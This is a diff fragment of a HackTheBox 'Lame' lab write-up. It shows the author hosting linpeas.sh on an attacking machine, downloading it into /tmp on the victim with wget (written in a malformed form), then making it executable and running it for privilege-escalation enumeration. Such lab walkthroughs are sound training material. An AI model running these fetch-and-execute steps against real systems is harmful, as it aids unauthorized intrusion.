Shellshock9001/HTB_Writeups/Lame/README.md

 Next, let's head over to the tmp directory and try to transfer over some enumeration files like linpeas.sh<br>
 I go to my attacking machine on my transfers directory where I store all my enumeration files, scripts, images, anything that can be used to help us get an edge on the victim machine.<br>
 I use `python3 -m http.server 80` to get the server up and running.<br>
-On the victim machine ill be in the /tmp directory and use wget://10.10.14.10/linpeas.sh which is my attacking machines ip from HackTheBox.<br>
+On the victim machine ill be in the <em><strong>/tmp</em></strong> directory and use 'wget://10.10.14.10/linpeas.sh' which is my attacking machines ip from HackTheBox.
 The file gets transferred over no problem.
 I use `chmod +x linpeas.sh` making it an executable file.<br>
 I use `./linpeas.sh` and it runs no problem.
 We get back a lot of results.
 Several vulnerabilities, but one in particular catches my eye with the yellow red highlight.